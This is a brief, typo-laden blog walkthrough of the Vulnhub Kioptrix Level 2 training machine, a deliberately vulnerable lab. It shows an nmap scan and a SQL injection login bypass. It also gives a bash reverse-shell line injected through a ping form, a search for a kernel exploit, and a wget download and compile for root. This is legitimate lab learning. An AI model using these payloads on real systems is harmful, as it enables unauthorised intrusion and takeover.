Vulnhub Kioptrix Level 2 Walkthrough

We start by scanning the host by Nmap:

Namp the host with namp –A –T4 –p- <ip> -vvs

Visit the page on port 80 required admin login and password …

from nmap scan we can see mysql databaseI

using a sql injection code (admin’ or ‘1’=’1’#) in the username page and got through

in the ping part we can inserted bash -i >& /dev/tcp/<192.168.1.9>/<4444> 0>&1  to get a shell bash to the server

stight to privilege escalate run the command cat /etc/*-release 

as we can see here the version which we can search for an exploit on google or just by using Searchsploit

i downloaded the exploit to my drive then started a SimpleHTTPServer to upload the exploit to the host

cd to the tmp folder and start a Wget command to download to patch file

Compile the file and run it … check for root

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s